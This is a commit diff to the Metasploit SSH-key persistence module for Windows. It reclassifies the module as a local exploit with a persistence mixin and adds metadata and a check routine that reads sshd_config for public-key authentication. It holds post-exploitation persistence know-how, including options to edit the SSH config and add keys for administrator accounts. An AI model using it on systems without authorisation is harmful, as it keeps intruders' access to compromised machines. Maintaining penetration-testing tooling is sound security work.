windows ssh keys update

rapid7 · Jan 29, 2025 · cda0881 · cda0881
1 parent ca16ee2
commit cda0881
Showing 1 changed file with 35 additions and 2 deletions.
diff --git a/modules/exploits/windows/persistence/sshkey.rb b/modules/exploits/windows/persistence/sshkey.rb
@@ -5,11 +5,13 @@
 
 require 'sshkey'
 
-class MetasploitModule < Msf::Post
+class MetasploitModule < Msf::Exploit::Local
   Rank = GoodRanking
 
   include Msf::Post::File
   include Msf::Post::Windows::UserProfiles
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Local::Persistence
   include Msf::Exploit::Deprecated
   moved_from 'post/windows/manage/sshkey_persistence'
 
@@ -35,6 +37,12 @@ def initialize(info = {})
               stdapi_fs_separator
             ]
           }
+        },
+        'DisclosureDate' => '1995-01-01', # ssh first release
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => []
         }
       )
     )
@@ -48,8 +56,31 @@ def initialize(info = {})
         OptBool.new('EDIT_CONFIG', [true, 'Edit ssh config to allow public key authentication', false ]),
         OptBool.new('ADMIN', [true, 'Add keys for administrator accounts', false ]),
         OptBool.new('CREATESSHFOLDER', [true, 'If no .ssh folder is found, create it for a user', false ])
-      ], self.class
+      ]
     )
+
+    deregister_options('WritableDir')
+  end
+
+  def check
+    return CheckCode::Safe("Unable to read SSH config: #{datastore['SSHD_CONFIG']}") unless readable?(datastore['SSHD_CONFIG'])
+
+    sshd_config = read_file(datastore['SSHD_CONFIG'])
+    pub_key_allowed = pub_key_auth_allowed?(sshd_config)
+
+    return CheckCode::Detected('Pubkey auth is enabled') if pub_key_allowed
+
+    if !pub_key_allowed && datastore['EDIT_CONFIG'] && writable?(sshd_config)
+      return CheckCode::Detected('Pubkey auth is NOT enabled, will edit config to allow it')
+    end
+
+    if !pub_key_allowed && datastore['EDIT_CONFIG'] && !writable?(sshd_config)
+      return CheckCode::Detected("Pubkey auth is NOT enabled, and unable to write to #{sshd_config}")
+    end
+
+    if !pub_key_allowed && !datastore['EDIT_CONFIG']
+      return CheckCode::Safe('Pubkey auth is NOT enabled, and you have not selected to edit the config')
+    end
   end
 
   def run
@@ -112,9 +143,11 @@ def pub_key_auth_allowed?(sshd_config)
     /^PubkeyAuthentication\s+(?<pub_key>yes|no)/ =~ sshd_config
     if pub_key && pub_key == 'no'
       print_error('Pubkey Authentication disabled')
+      return false
     elsif pub_key
       vprint_good("Pubkey set to #{pub_key}")
     end
+    true
   end
 
   def auth_key_file_name(sshd_config)